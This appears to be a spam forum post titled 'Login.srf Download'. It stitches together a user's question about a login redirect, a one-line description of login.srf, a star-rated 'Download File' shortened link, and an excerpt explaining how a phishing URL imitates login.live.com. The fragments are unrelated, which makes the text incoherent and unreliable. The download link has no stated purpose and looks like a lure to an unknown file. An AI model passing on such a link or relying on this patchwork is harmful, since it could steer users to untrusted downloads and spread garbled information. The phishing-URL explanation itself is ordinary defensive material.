Login.srf Download

1 view
Skip to first unread message

Artemisia Grieves

unread,
Jan 17, 2024, 9:54:12 PM1/17/24
to inmorerun

After I have done the login, instead of showing the consent page and redirecting the URL back to my web: , it forwards the URL to , which I have no idea what it is.That login.srf link shows this page:

The file "login.srf" is commonly used by secure websites. It processes the user's username and password, sends a cookie identifying the user back to the browser, and redirects the user to the secure page.

login.srf download


Download File ★★★★★ https://t.co/4SxAUuqj7Q



As with the vast majority of phishing messages, actually clicking on the link in the email loads up a different URL to that which is written out. In this case it leads us to:
-939001820183093.8982190oieenue.default.aspx.id-1033.[domain removed].com/gin.live.com.login.srf.wsignin.act-939001820183093.8982190oieenue.default.aspx.id-1033/login.srf.htm

At a quick glance they look very similar. Both contain the phrases login.live.com, login.srf, wsignin and aspx along with seemingly random strings of numbers. The thing to notice is that the official login page is on the login subdomain of live.com whereas the URL that the email pointed to features many subdomains, meaning that the actual domain that the page is hosted on is hidden in the middle of the address.

dca57bae1f
Reply all
Reply to author
Forward
0 new messages